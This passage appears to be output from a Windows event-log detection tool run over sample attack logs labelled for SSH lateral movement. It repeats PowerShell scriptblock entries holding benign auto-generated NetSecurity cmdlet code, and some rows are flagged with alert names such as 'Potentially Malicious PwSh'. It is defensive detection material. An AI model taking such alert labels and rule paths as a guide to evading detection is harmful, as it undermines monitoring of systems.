[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 